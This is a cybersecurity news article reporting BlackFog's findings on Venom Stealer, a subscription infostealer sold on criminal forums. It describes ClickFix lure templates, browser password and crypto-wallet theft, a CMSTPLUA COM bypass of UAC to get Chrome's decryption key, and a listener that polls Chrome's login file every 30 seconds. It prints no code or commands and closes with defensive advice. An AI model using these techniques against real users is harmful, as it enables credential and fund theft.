A new malware has been quietly spreading across cybercrime networks, and security researchers say it is far more capable than most tools of its kind.
Called Venom Stealer, this malware-as-a-service platform does not just harvest credentials — it builds an entire automated attack chain that begins with a simple social engineering trick and ends with the complete theft of a victim’s digital life, including all funds stored in cryptocurrency wallets.
Most credential stealers work in a straightforward way: infect a machine, grab passwords, send them off, and disappear. Venom Stealer operates very differently.
It embeds ClickFix social engineering directly into its operator panel, automates every stage of the attack from initial access through data theft, and keeps the exfiltration pipeline running well after the first payload completes.
That makes it significantly more dangerous than commodity stealers like Lumma, Vidar, and RedLine, which typically stop at credential harvesting and do not sustain ongoing access after the initial infection.
BlackFog analysts identified this threat after tracking its activity closely on underground cybercrime forums.
The developer, operating under the handle “VenomStealer,” offers access through a subscription model priced between $250 per month and $1,800 for a lifetime license.
The platform includes Telegram-based licensing, a 15% affiliate program, and a native C++ binary payload compiled separately for each operator through the web panel.
Multiple updates shipped in March 2026 alone, which strongly suggests this is a full-time criminal operation with active development.
Venom Stealer’s Advertisement (Source – BlackFOG)
The attack starts when a target visits a ClickFix page controlled by the operator. Venom provides four ready-made templates for both Windows and macOS — a fake Cloudflare CAPTCHA, a fake operating system update, a fake SSL certificate error, and a fake font installation page.
Fake Cloudflare CAPTCHA Template (Source – BlackFOG)
Each template tricks the victim into opening a Run dialog or Terminal window, pasting a command, and pressing Enter.
The Windows ClickFix Delivery Panel (Source – BlackFOG)
Since the user runs the command themselves, the process appears self-initiated and slips past security tools that watch for suspicious parent-child process relationships.
The macOS ClickFix Delivery Panel (Source – BlackFOG)
Once the payload runs, it immediately sweeps every Chromium and Firefox-based browser on the machine, extracting saved passwords, session cookies, browsing history, autofill data, and cryptocurrency wallet vaults from every profile.
Chrome’s v10 and v20 password encryption is bypassed through a silent privilege escalation using the CMSTPLUA COM interface, which pulls the decryption key without triggering any UAC dialog and leaves no forensic trace.
System fingerprinting and browser extension inventories are also collected, giving attackers a thorough profile of each victim before the stolen data is sent off the device.
Persistence and the Continuous Exfiltration Window
What separates Venom Stealer from most infostealers is what happens after the initial theft. Rather than running once and exiting, Venom stays active on the compromised machine and continuously monitors Chrome’s Login Data file, capturing any new credentials saved after the infection begins.
This session listener polls the file every 30 seconds, meaning that even if a victim resets their passwords following an incident, those new credentials are captured the moment Chrome saves them.
Session Listener Lifecycle (Source – BlackFOG)
Any cryptocurrency wallet data discovered is sent to a server-side GPU cracking engine, which automatically cracks and drains wallets across nine blockchain networks including MetaMask, Phantom, Exodus, and Electrum.
A March 9 update added a File Password and Seed Finder that scans the local filesystem for seed phrases, putting users at risk even if they never saved credentials directly inside a browser.
This means the exfiltration window does not close — it continues running and collecting more data as time passes.
Organizations can reduce their exposure to threats like this by restricting PowerShell execution policies, disabling the Run dialog for standard user accounts through Group Policy, and providing regular employee training focused on recognizing ClickFix-style social engineering pages.
Since the attack relies entirely on data leaving the device, monitoring and controlling outbound network traffic are critical defensive steps that can help detect or interrupt exfiltration activity before significant damage is done.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The post Hackers Use Venom Stealer to Turn ClickFix Lures Into Full Data Exfiltration Pipelines appeared first on Cyber Security News.
